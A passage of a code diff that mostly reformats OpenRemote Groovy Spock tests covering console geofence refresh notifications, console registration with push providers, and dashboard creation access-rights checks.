+    geofences = anonymousRulesResource.getAssetGeofences(null, UniqueIdentifierGenerator.generateId("nonExistentConsole"))
 
-        then: "an empty array should be returned"
-        assert geofences.size() == 0
+    then: "an empty array should be returned"
+    assert geofences.size() == 0
 
-        when: "a console is deleted"
-        assetStorageService.delete([testUser3Console2.id],false)
+    when: "a console is deleted"
+    assetStorageService.delete([testUser3Console2.id],false)
 
-        then: "the deleted console should be removed from ORConsoleGeofenceAssetAdapter"
-        conditions.eventually {
-            assert !geofenceAdapter.consoleIdRealmMap.containsKey(testUser3Console2.id)
-        }
+    then: "the deleted console should be removed from ORConsoleGeofenceAssetAdapter"
+    conditions.eventually {
+      assert !geofenceAdapter.consoleIdRealmMap.containsKey(testUser3Console2.id)
+    }
 
-        then: "no geofences should be returned for this deleted console"
-        conditions.eventually {
-            geofences = anonymousRulesResource.getAssetGeofences(null, testUser3Console2.id)
-            assert geofences.size() == 0
-        }
+    then: "no geofences should be returned for this deleted console"
+    conditions.eventually {
+      geofences = anonymousRulesResource.getAssetGeofences(null, testUser3Console2.id)
+      assert geofences.size() == 0
+    }
 
-        when: "the notifications are cleared"
-        notificationIds.clear()
-        messages.clear()
+    when: "the notifications are cleared"
+    notificationIds.clear()
+    messages.clear()
 
-        and: "a new ruleset is deployed on the console parent asset with multiple location predicate rules (including a duplicate and a rectangular predicate)"
-        def newRuleset = new AssetRuleset(
+    and: "a new ruleset is deployed on the console parent asset with multiple location predicate rules (including a duplicate and a rectangular predicate)"
+    def newRuleset = new AssetRuleset(
             testUser3Console1.parentId,
             "Console test location predicates",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicLocationPredicates.groovy").text)
-        newRuleset = rulesetStorageService.merge(newRuleset)
-        RulesEngine consoleParentEngine = null
-        def newLocationPredicate = new RadialGeofencePredicate(50, 0, -60)
+    newRuleset = rulesetStorageService.merge(newRuleset)
+    RulesEngine consoleParentEngine = null
+    def newLocationPredicate = new RadialGeofencePredicate(50, 0, -60)
 
-        then: "the new rule engine should be created and be running"
-        conditions.eventually {
-            consoleParentEngine = rulesService.assetEngines.get(testUser3Console1.parentId)
-            assert consoleParentEngine != null
-            assert consoleParentEngine.isRunning()
-            assert consoleParentEngine.deployments.size() == 1
-            assert consoleParentEngine.deployments.values().any({
-                it.name == "Console test location predicates" && it.status == DEPLOYED
-            })
-        }
-
-        then: "a push notification should have been sent to the two remaining consoles telling them to refresh their geofences"
-        conditions.eventually {
-            assert notificationIds.size() == 2
-            assert messages.any {it == "${testUser3Console1.id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${anonymousConsole1.id}_GEOFENCE_REFRESH"}
-        }
-
-        then: "the geofences of testUser3Console1 should contain the welcome home geofence and new radial geofence (but not the rectangular and duplicate predicates)"
-        conditions.eventually {
-            geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console1.id)
-            assert geofences.size() == 2
-            def geofence1 = geofences.find {
-                it.id == testUser3Console1.id + "_" + Integer.toString(
-                        expectedLocationPredicate.hashCode())
-            }
-            def geofence2 = geofences.find {
-                it.id == testUser3Console1.id + "_" + Integer.toString(
-                        newLocationPredicate.hashCode())
-            }
-            assert geofence1 != null && geofence2 != null
-            assert geofence1.lat == expectedLocationPredicate.lat
-            assert geofence1.lng == expectedLocationPredicate.lng
-            assert geofence1.radius == expectedLocationPredicate.radius
-            assert geofence1.httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
-            assert geofence1.url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
-            assert geofence2.lat == newLocationPredicate.lat
-            assert geofence2.lng == newLocationPredicate.lng
-            assert geofence2.radius == newLocationPredicate.radius
-            assert geofence2.httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
-            assert geofence2.url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
-        }
-
-        when: "the notifications are cleared"
-        notificationIds.clear()
-        messages.clear()
-
-        and: "an existing ruleset containing a radial location predicate is updated"
-        newRuleset.rules = getClass().getResource("/org/openremote/test/rules/BasicLocationPredicates2.groovy").text
-        newRuleset = rulesetStorageService.merge(newRuleset)
-        newLocationPredicate = new RadialGeofencePredicate(150, 10, 40)
-
-        then: "a push notification should have been sent to the two remaining consoles telling them to refresh their geofences (from the realm engine and asset engine)"
-        conditions.eventually {
-            assert messages.any {it == "${anonymousConsole1.id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${testUser3Console1.id}_GEOFENCE_REFRESH"}
-        }
-
-        then: "the geofences of testUser3Console1 should still contain two geofences but the location of the second should have been updated"
-        conditions.eventually {
-            geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console1.id)
-            assert geofences.size() == 2
-            def geofence1 = geofences.find {
-                it.id == testUser3Console1.id + "_" + Integer.toString(
-                        expectedLocationPredicate.hashCode())
-            }
-            def geofence2 = geofences.find {
-                it.id == testUser3Console1.id + "_" + Integer.toString(
-                        newLocationPredicate.hashCode())
-            }
-            assert geofence1 != null && geofence2 != null
-            assert geofence1.lat == expectedLocationPredicate.lat
-            assert geofence1.lng == expectedLocationPredicate.lng
-            assert geofence1.radius == expectedLocationPredicate.radius
-            assert geofence1.httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
-            assert geofence1.url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
-            assert geofence2.lat == newLocationPredicate.lat
-            assert geofence2.lng == newLocationPredicate.lng
-            assert geofence2.radius == newLocationPredicate.radius
-            assert geofence2.httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
-            assert geofence2.url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
-        }
-
-        when: "previous notification messages are cleared"
-        notificationIds.clear()
-        messages.clear()
-
-        and: "a location predicate ruleset is removed"
-        rulesetStorageService.delete(AssetRuleset.class, newRuleset.id)
-
-        then: "only the welcome home geofence should remain"
-        conditions.eventually {
-            geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console1.id)
-            assert geofences.size() == 1
-            assert geofences[0].id == testUser3Console1.id + "_" + Integer.toString(
-                    expectedLocationPredicate.hashCode())
-            assert geofences[0].lat == expectedLocationPredicate.lat
-            assert geofences[0].lng == expectedLocationPredicate.lng
-            assert geofences[0].radius == expectedLocationPredicate.radius
-            assert geofences[0].httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
-            assert geofences[0].url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
-        }
-
-        and: "the consoles should have been notified to refresh their geofences"
-        conditions.eventually {
-            assert messages.any {it == "${testUser3Console1.id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${anonymousConsole1.id}_GEOFENCE_REFRESH"}
-        }
-
-        when: "previous notification messages are cleared"
-        notificationIds.clear()
-        messages.clear()
-
-        and: "another 10 consoles are added to the system"
-        def testUser3Console1Id = testUser3Console1.id
-        def extraConsoles = IntStream.rangeClosed(3, 12).mapToObj({
-            testUser3Console1.id = null
-            testUser3Console1.name = "Test Console $it"
-            return assetStorageService.merge(testUser3Console1)
-        }).collect({ it as ConsoleAsset })
-        testUser3Console1.id = testUser3Console1Id
-
-        then: "the extra consoles should have been added"
-        assert extraConsoles.size() == 10
-
-        and: "a push notifications should have been sent to each new console to refresh their geofence rules"
-        conditions.eventually {
-            assert messages.any {it == "${extraConsoles.get(0).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(1).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(2).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(3).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(4).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(5).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(6).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(7).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(8).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(9).id}_GEOFENCE_REFRESH"}
-        }
-
-        when: "previous notification messages are cleared"
-        notificationIds.clear()
-        messages.clear()
-
-        and: "a new ruleset is created containing a radial location predicate"
-        newRuleset = new AssetRuleset(
-                testUser3Console1.parentId,
-                "Console test location predicates",
-                Ruleset.Lang.GROOVY,
-                getClass().getResource("/org/openremote/test/rules/BasicLocationPredicates.groovy").text)
-        newRuleset = rulesetStorageService.merge(newRuleset)
-
-        then: "a push notification should have been sent to all consoles telling them to refresh their geofences"
-        conditions.eventually {
-            assert messages.any {it == "${testUser3Console1.id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${anonymousConsole1.id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(0).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(1).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(2).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(3).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(4).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(5).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(6).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(7).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(8).id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${extraConsoles.get(9).id}_GEOFENCE_REFRESH"}
-        }
-
-        when: "the RULE_STATE meta is set to false on a console's location attribute"
-        testUser3Console1 = assetStorageService.find(testUser3Console1.id, true)
-        testUser3Console1.getAttribute(Asset.LOCATION.name).ifPresent{it.addMeta(new MetaItem<>(MetaItemType.RULE_STATE, false))}
-        testUser3Console1 = assetStorageService.merge(testUser3Console1)
-
-        then: "no geofences should remain for this console"
-        conditions.eventually {
-            geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console1.id)
-            assert geofences.size() == 0
-        }
-
-        cleanup: "the mock is removed"
-        if (notificationService != null) {
-            notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), pushNotificationHandler)
-        }
+    then: "the new rule engine should be created and be running"
+    conditions.eventually {
+      consoleParentEngine = rulesService.assetEngines.get(testUser3Console1.parentId)
+      assert consoleParentEngine != null
+      assert consoleParentEngine.isRunning()
+      assert consoleParentEngine.deployments.size() == 1
+      assert consoleParentEngine.deployments.values().any({
+        it.name == "Console test location predicates" && it.status == DEPLOYED
+      })
     }
 
-    protected static ConsoleRegistration createConsoleRegistration(String id, String name, String pushToken) {
-        return new ConsoleRegistration(
-                id,
-                name,
-                "1.0",
-                "Android 7.0",
-                new HashMap<String, ConsoleProvider>(
+    then: "a push notification should have been sent to the two remaining consoles telling them to refresh their geofences"
+    conditions.eventually {
+      assert notificationIds.size() == 2
+      assert messages.any {it == "${testUser3Console1.id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${anonymousConsole1.id}_GEOFENCE_REFRESH"}
+    }
+
+    then: "the geofences of testUser3Console1 should contain the welcome home geofence and new radial geofence (but not the rectangular and duplicate predicates)"
+    conditions.eventually {
+      geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console1.id)
+      assert geofences.size() == 2
+      def geofence1 = geofences.find {
+        it.id == testUser3Console1.id + "_" + Integer.toString(
+        expectedLocationPredicate.hashCode())
+      }
+      def geofence2 = geofences.find {
+        it.id == testUser3Console1.id + "_" + Integer.toString(
+        newLocationPredicate.hashCode())
+      }
+      assert geofence1 != null && geofence2 != null
+      assert geofence1.lat == expectedLocationPredicate.lat
+      assert geofence1.lng == expectedLocationPredicate.lng
+      assert geofence1.radius == expectedLocationPredicate.radius
+      assert geofence1.httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
+      assert geofence1.url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
+      assert geofence2.lat == newLocationPredicate.lat
+      assert geofence2.lng == newLocationPredicate.lng
+      assert geofence2.radius == newLocationPredicate.radius
+      assert geofence2.httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
+      assert geofence2.url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
+    }
+
+    when: "the notifications are cleared"
+    notificationIds.clear()
+    messages.clear()
+
+    and: "an existing ruleset containing a radial location predicate is updated"
+    newRuleset.rules = getClass().getResource("/org/openremote/test/rules/BasicLocationPredicates2.groovy").text
+    newRuleset = rulesetStorageService.merge(newRuleset)
+    newLocationPredicate = new RadialGeofencePredicate(150, 10, 40)
+
+    then: "a push notification should have been sent to the two remaining consoles telling them to refresh their geofences (from the realm engine and asset engine)"
+    conditions.eventually {
+      assert messages.any {it == "${anonymousConsole1.id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${testUser3Console1.id}_GEOFENCE_REFRESH"}
+    }
+
+    then: "the geofences of testUser3Console1 should still contain two geofences but the location of the second should have been updated"
+    conditions.eventually {
+      geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console1.id)
+      assert geofences.size() == 2
+      def geofence1 = geofences.find {
+        it.id == testUser3Console1.id + "_" + Integer.toString(
+        expectedLocationPredicate.hashCode())
+      }
+      def geofence2 = geofences.find {
+        it.id == testUser3Console1.id + "_" + Integer.toString(
+        newLocationPredicate.hashCode())
+      }
+      assert geofence1 != null && geofence2 != null
+      assert geofence1.lat == expectedLocationPredicate.lat
+      assert geofence1.lng == expectedLocationPredicate.lng
+      assert geofence1.radius == expectedLocationPredicate.radius
+      assert geofence1.httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
+      assert geofence1.url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
+      assert geofence2.lat == newLocationPredicate.lat
+      assert geofence2.lng == newLocationPredicate.lng
+      assert geofence2.radius == newLocationPredicate.radius
+      assert geofence2.httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
+      assert geofence2.url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
+    }
+
+    when: "previous notification messages are cleared"
+    notificationIds.clear()
+    messages.clear()
+
+    and: "a location predicate ruleset is removed"
+    rulesetStorageService.delete(AssetRuleset.class, newRuleset.id)
+
+    then: "only the welcome home geofence should remain"
+    conditions.eventually {
+      geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console1.id)
+      assert geofences.size() == 1
+      assert geofences[0].id == testUser3Console1.id + "_" + Integer.toString(
+      expectedLocationPredicate.hashCode())
+      assert geofences[0].lat == expectedLocationPredicate.lat
+      assert geofences[0].lng == expectedLocationPredicate.lng
+      assert geofences[0].radius == expectedLocationPredicate.radius
+      assert geofences[0].httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
+      assert geofences[0].url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
+    }
+
+    and: "the consoles should have been notified to refresh their geofences"
+    conditions.eventually {
+      assert messages.any {it == "${testUser3Console1.id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${anonymousConsole1.id}_GEOFENCE_REFRESH"}
+    }
+
+    when: "previous notification messages are cleared"
+    notificationIds.clear()
+    messages.clear()
+
+    and: "another 10 consoles are added to the system"
+    def testUser3Console1Id = testUser3Console1.id
+    def extraConsoles = IntStream.rangeClosed(3, 12).mapToObj({
+      testUser3Console1.id = null
+      testUser3Console1.name = "Test Console $it"
+      return assetStorageService.merge(testUser3Console1)
+    }).collect({ it as ConsoleAsset })
+    testUser3Console1.id = testUser3Console1Id
+
+    then: "the extra consoles should have been added"
+    assert extraConsoles.size() == 10
+
+    and: "a push notifications should have been sent to each new console to refresh their geofence rules"
+    conditions.eventually {
+      assert messages.any {it == "${extraConsoles.get(0).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(1).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(2).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(3).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(4).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(5).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(6).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(7).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(8).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(9).id}_GEOFENCE_REFRESH"}
+    }
+
+    when: "previous notification messages are cleared"
+    notificationIds.clear()
+    messages.clear()
+
+    and: "a new ruleset is created containing a radial location predicate"
+    newRuleset = new AssetRuleset(
+            testUser3Console1.parentId,
+            "Console test location predicates",
+            Ruleset.Lang.GROOVY,
+            getClass().getResource("/org/openremote/test/rules/BasicLocationPredicates.groovy").text)
+    newRuleset = rulesetStorageService.merge(newRuleset)
+
+    then: "a push notification should have been sent to all consoles telling them to refresh their geofences"
+    conditions.eventually {
+      assert messages.any {it == "${testUser3Console1.id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${anonymousConsole1.id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(0).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(1).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(2).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(3).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(4).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(5).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(6).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(7).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(8).id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${extraConsoles.get(9).id}_GEOFENCE_REFRESH"}
+    }
+
+    when: "the RULE_STATE meta is set to false on a console's location attribute"
+    testUser3Console1 = assetStorageService.find(testUser3Console1.id, true)
+    testUser3Console1.getAttribute(Asset.LOCATION.name).ifPresent{
+      it.addMeta(new MetaItem<>(MetaItemType.RULE_STATE, false))
+    }
+    testUser3Console1 = assetStorageService.merge(testUser3Console1)
+
+    then: "no geofences should remain for this console"
+    conditions.eventually {
+      geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console1.id)
+      assert geofences.size() == 0
+    }
+
+    cleanup: "the mock is removed"
+    if (notificationService != null) {
+      notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), pushNotificationHandler)
+    }
+  }
+
+  protected static ConsoleRegistration createConsoleRegistration(String id, String name, String pushToken) {
+    return new ConsoleRegistration(
+            id,
+            name,
+            "1.0",
+            "Android 7.0",
+            new HashMap<String, ConsoleProvider>(
                     push: new ConsoleProvider(
-                                "fcm",
-                                true,
-                                true,
-                                true,
-                                true,
-                                false,
-                                [token: pushToken]
-                        )
-                ),
-                "",
-                ["manager"] as String[]
-        )
-    }
+                            "fcm",
+                            true,
+                            true,
+                            true,
+                            true,
+                            false,
+                            [token: pushToken]
+                            )
+                    ),
+            "",
+            ["manager"] as String[]
+            )
+  }
 
-    protected static String getPushToken(ConsoleAsset console) {
-        return console.getConsoleProviders()
-                .map { it.get("push") }
-                .map { it.data.get("token") as String }
-                .orElse(null)
-    }
+  protected static String getPushToken(ConsoleAsset console) {
+    return console.getConsoleProviders()
+            .map { it.get("push") }
+            .map { it.data.get("token") as String }
+            .orElse(null)
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/console/ConsoleTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/console/ConsoleTest.groovy
@@ -410,9 +410,8 @@ class ConsoleTest extends Specification implements ManagerContainerTrait {
                 "Test Console",
                 "1.0",
                 "Android 7.0",
-                new HashMap<String, ConsoleProvider>() {
-                    {
-                        put("geofence", new ConsoleProvider(
+                new HashMap<String, ConsoleProvider>(
+                        geofence: new ConsoleProvider(
                                 ORConsoleGeofenceAssetAdapter.NAME,
                                 true,
                                 false,
@@ -420,8 +419,8 @@ class ConsoleTest extends Specification implements ManagerContainerTrait {
                                 false,
                                 false,
                                 null
-                        ))
-                        put("push", new ConsoleProvider(
+                        ),
+                        push: new ConsoleProvider(
                                 "fcm",
                                 true,
                                 true,
@@ -429,9 +428,8 @@ class ConsoleTest extends Specification implements ManagerContainerTrait {
                                 true,
                                 false,
                             (Map)parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                        ))
-                    }
-                },
+                        )
+                  ),
                 "",
                 ["manager"] as String[])
         def returnedConsoleRegistration = authenticatedConsoleResource.register(null, consoleRegistration)
@@ -1030,9 +1028,8 @@ class ConsoleTest extends Specification implements ManagerContainerTrait {
                 name,
                 "1.0",
                 "Android 7.0",
-                new HashMap<String, ConsoleProvider>() {
-                    {
-                        put("push", new ConsoleProvider(
+                new HashMap<String, ConsoleProvider>(
+                    push: new ConsoleProvider(
                                 "fcm",
                                 true,
                                 true,
@@ -1040,9 +1037,8 @@ class ConsoleTest extends Specification implements ManagerContainerTrait {
                                 true,
                                 false,
                                 [token: pushToken]
-                        ))
-                    }
-                },
+                        )
+                ),
                 "",
                 ["manager"] as String[]
         )

--- a/test/src/test/groovy/org/openremote/test/dashboard/DashboardTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/dashboard/DashboardTest.groovy
@@ -45,351 +45,359 @@ import static org.openremote.model.Constants.*
 
 class DashboardTest extends Specification implements ManagerContainerTrait {
 
-    def "Test dashboard creation and access rights"() {
-
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-
-        and: "all users are logged in"
-        def adminUserAccessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-        def privateUser1AccessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "testuser1",
-                "testuser1"
-        )
-        def smartcityUserAccessToken = authenticate(
-                container,
-                keycloakTestSetup.realmCity.name,
-                KEYCLOAK_CLIENT_ID,
-                "smartcity",
-                "smartcity"
-        )
-
-        and: "the admin user has been retrieved"
-        def serverUri = serverUri(serverPort)
-        def adminUserResource = getClientApiTarget(serverUri, MASTER_REALM, adminUserAccessToken).proxy(UserResource)
-        def adminUser = adminUserResource.getCurrent(null)
-
-        and: "an additional user without READ_INSIGHTS is created"
-        ClientRole[] noInsightsRoles = new ClientRole[] { ClientRole.READ_ASSETS }
-        User noAccessUser = keycloakTestSetup.createUser(MASTER_REALM, "noinsights", "noinsights", "firstName", "lastName", "noinsights@openremote.local", true, noInsightsRoles)
-        def noAccessUserToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, "noinsights", "noinsights")
-
-        and: "an additional user without WRITE_INSIGHTS is created"
-        ClientRole[] readonlyRoles = new ClientRole[] { ClientRole.READ_ASSETS, ClientRole.READ_INSIGHTS }
-        User readonlyUser = keycloakTestSetup.createUser(MASTER_REALM, "readinsights", "readinsights", "firstName", "lastName", "readinsights@openremote.local", true, readonlyRoles)
-        def readonlyUserToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, "readinsights", "readinsights")
-
-        and: "an additional user with all permissions is created"
-        User alternativeUser = keycloakTestSetup.createUser(MASTER_REALM, "alternativeuser", "alternativeuser", "alternative", "user", "alternativeuser@openremote.local", true, KeycloakTestSetup.REGULAR_USER_ROLES)
-        def alternativeUserToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, "alternativeuser", "alternativeuser")
-
-        and: "the dashboard resource"
-        def adminUserDashboardResource = getClientApiTarget(serverUri, MASTER_REALM, adminUserAccessToken).proxy(DashboardResource.class)
-        def privateUser1DashboardResource = getClientApiTarget(serverUri, MASTER_REALM, privateUser1AccessToken).proxy(DashboardResource.class)
-        def noAccessDashboardResource = getClientApiTarget(serverUri, MASTER_REALM, noAccessUserToken).proxy(DashboardResource.class)
-        def readonlyDashboardResource = getClientApiTarget(serverUri, MASTER_REALM, readonlyUserToken).proxy(DashboardResource.class)
-        def alternativeUserDashboardResource = getClientApiTarget(serverUri, MASTER_REALM, alternativeUserToken).proxy(DashboardResource.class)
-        def publicUserDashboardResource = getClientApiTarget(serverUri, MASTER_REALM).proxy(DashboardResource.class)
-        def smartcityDashboardResource = getClientApiTarget(serverUri, keycloakTestSetup.realmCity.name, smartcityUserAccessToken).proxy(DashboardResource.class)
-        def adminUserAssetResource = getClientApiTarget(serverUri, MASTER_REALM, adminUserAccessToken).proxy(AssetResource.class)
-
-        /* ----------------------- */
-
-        // Test to verify dashboards can be CREATED and FETCHED by different users.
-
-        when: "a user without WRITE_INSIGHTS tries to create dashboard"
-        DashboardScreenPreset[] tempScreenPresets = Arrays.asList(new DashboardScreenPreset("preset1", DashboardScalingPreset.KEEP_LAYOUT)).toArray() as DashboardScreenPreset[]
-        Dashboard temp1NoAccess = new Dashboard(MASTER_REALM, "dashboard1", tempScreenPresets, noAccessUser.id)
-        noAccessDashboardResource.create(null, temp1NoAccess)
-
-        then: "an exception is thrown that reflects their permissions"
-        thrown ForbiddenException
-
-        when: "a user without WRITE_INSIGHTS, but with READ_INSIGHTS, tries to create dashboard"
-        Dashboard temp1Readonly = new Dashboard(MASTER_REALM, "dashboard1", tempScreenPresets, readonlyUser.id)
-        readonlyDashboardResource.create(null, temp1Readonly)
-
-        then: "an exception is also thrown"
-        thrown ForbiddenException
-
-        when: "a dashboard is created in the authenticated realm"
-        DashboardScreenPreset[] screenPresets = Arrays.asList(new DashboardScreenPreset("preset1", DashboardScalingPreset.KEEP_LAYOUT)).toArray() as DashboardScreenPreset[]
-        Dashboard temp1 = new Dashboard(MASTER_REALM, "dashboard1", screenPresets, adminUser.id)
-        adminUserDashboardResource.create(null, temp1)
-        Dashboard temp2 = new Dashboard(MASTER_REALM, "dashboard2", screenPresets, adminUser.id).setOwnerId(keycloakTestSetup.testuser1Id)
-        privateUser1DashboardResource.create(null, temp2)
-
-        then: "requesting the dashboard should return the same object"
-        def adminDashboards = adminUserDashboardResource.getAllRealmDashboards(null, MASTER_REALM)
-        def adminDashboard = adminDashboards[0]
-        def privateUser1Dashboard = adminDashboards[1]
-        assert adminDashboards.length == 2
-        def userDashboards = privateUser1DashboardResource.getAllRealmDashboards(null, MASTER_REALM)
-        assert userDashboards.length == 2
-        assert adminDashboard.id == userDashboards[0].id
-        assert privateUser1Dashboard.id == userDashboards[1].id
+  def "Test dashboard creation and access rights"() {
+
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "all users are logged in"
+    def adminUserAccessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+    def privateUser1AccessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "testuser1",
+            "testuser1"
+            )
+    def smartcityUserAccessToken = authenticate(
+            container,
+            keycloakTestSetup.realmCity.name,
+            KEYCLOAK_CLIENT_ID,
+            "smartcity",
+            "smartcity"
+            )
+
+    and: "the admin user has been retrieved"
+    def serverUri = serverUri(serverPort)
+    def adminUserResource = getClientApiTarget(serverUri, MASTER_REALM, adminUserAccessToken).proxy(UserResource)
+    def adminUser = adminUserResource.getCurrent(null)
+
+    and: "an additional user without READ_INSIGHTS is created"
+    ClientRole[] noInsightsRoles = new ClientRole[] {
+              ClientRole.READ_ASSETS
+            }
+    User noAccessUser = keycloakTestSetup.createUser(MASTER_REALM, "noinsights", "noinsights", "firstName", "lastName", "noinsights@openremote.local", true, noInsightsRoles)
+    def noAccessUserToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, "noinsights", "noinsights")
+
+    and: "an additional user without WRITE_INSIGHTS is created"
+    ClientRole[] readonlyRoles = new ClientRole[] {
+              ClientRole.READ_ASSETS, ClientRole.READ_INSIGHTS
+            }
+    User readonlyUser = keycloakTestSetup.createUser(MASTER_REALM, "readinsights", "readinsights", "firstName", "lastName", "readinsights@openremote.local", true, readonlyRoles)
+    def readonlyUserToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, "readinsights", "readinsights")
+
+    and: "an additional user with all permissions is created"
+    User alternativeUser = keycloakTestSetup.createUser(MASTER_REALM, "alternativeuser", "alternativeuser", "alternative", "user", "alternativeuser@openremote.local", true, KeycloakTestSetup.REGULAR_USER_ROLES)
+    def alternativeUserToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, "alternativeuser", "alternativeuser")
+
+    and: "the dashboard resource"
+    def adminUserDashboardResource = getClientApiTarget(serverUri, MASTER_REALM, adminUserAccessToken).proxy(DashboardResource.class)
+    def privateUser1DashboardResource = getClientApiTarget(serverUri, MASTER_REALM, privateUser1AccessToken).proxy(DashboardResource.class)
